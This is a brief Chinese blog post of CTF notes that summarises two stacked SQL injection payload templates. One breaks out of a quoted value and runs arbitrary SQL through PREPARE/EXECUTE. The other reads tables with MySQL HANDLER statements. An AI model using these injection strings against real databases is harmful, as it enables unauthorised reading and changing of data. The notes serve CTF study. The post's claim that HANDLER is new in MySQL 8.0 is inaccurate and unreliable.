ctf堆叠注入总结(持续更新)

第一种

1';USE db_name;SET @sql=CONCAT('sql contents');PREPARE stmt_name FROM @sql;EXECUTE stmt_name;

 

第二种

1';HANDLER table_name OPEN;HANDLER table_name READ [NEXT|FIRST];HANDLER table_name CLOSE;

HANDLER语句是mysql8.0的新特性,详情请查阅 https://dev.mysql.com/doc/refman/8.0/en/handler.html

posted @ 2020-10-30 10:20  sec_j  阅读(359)  评论(0编辑  收藏  举报